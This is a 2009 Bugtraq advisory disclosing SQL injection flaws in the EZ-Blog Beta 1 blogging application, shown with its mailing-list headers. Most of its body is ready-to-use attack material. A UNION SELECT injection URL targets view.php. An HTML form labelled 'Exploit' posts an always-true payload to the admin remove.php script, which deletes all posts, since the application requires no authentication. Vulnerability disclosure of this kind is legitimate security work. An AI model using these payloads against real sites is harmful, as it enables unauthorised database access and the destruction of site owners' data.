EZ-Blog Beta 1 Multiple SQL Injection

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: EZ-Blog Beta 1 Multiple SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Sun, 1 Mar 2009 23:15:23 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=6efxoKD4iz6jRvEmj5bQPCUVg+tYcugCwnjdt2YkLJg=; b=MN4b2a93eBFOMfmZa7t+QFiDvlcYcMm4K9wF5KHGtNrnocjO11adXgTHXsym6hQuvn YikJ7X8v+GauW+okl27So+GAwNBAvN3C4Ewc5cm2nCz3lISnWNCLSPepObK/80P/imsT 3YXM0fXrBu0LMpRmZqfIj63HpoWucZNBCM3fo=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=DIDcVuO2RK8YXVVoprAUTIOS2EMEWsmLWdKTkUzTj3vSbSbOw/iq7eA0J5KudtAlsD ZdgB16hkkJRaYWO+IxPjvUbLbO7oqq0k6s+UF5FG5FCUvN3gd30dDbK4MmIUs6Oz0ZqN dusmbQ84RKNVA5tuOQfSvYj1yr6+i6W4GUopo=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******   Salvatore "drosophila" Fresta   *******


Application:      EZ-Blog
                         http://sourceforge.net/projects/ez-blog/
Version:            Beta 1
Bug:                 * Multiple SQL Injection
Exploitation:     Remote
Date:                1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author:             Salvatore "drosophila" Fresta
                         e-mail: drosophilaxxx@xxxxxxxxx
                

*************************************************

- BUGS

SQL Injection:

        Requisites: magic_quotes_gpc = off

        This is a crazy application because it not
        require authentication for posting, deleting,
        etc. and it is entirely vulnerable to SQL
        Injection, as follows:
        
        http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23
        
        There aren't hight reserved information on the
        database, but it is possible to cause inconvenience.
        The following injection allow to delete all
        posts:
        
        <form action="http://site/path/admin/remove.php"; method="POST">
            <input type="hidden" name="kill" value="1'or'1'='1">
            <input type="hidden" name="confirm" value="1">
            <input type="hidden" name="rm" value="true">
            <input type="submit" value="Exploit">
        </form>


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

Prev by Date: [SECURITY] [DSA 1719-2] New GNUTLS packages fix regression
Next by Date: Announcing Cap'r Mak'r
Previous by thread: [SECURITY] [DSA 1719-2] New GNUTLS packages fix regression
Next by thread: Announcing Cap'r Mak'r
Index(es):
- Date
- Thread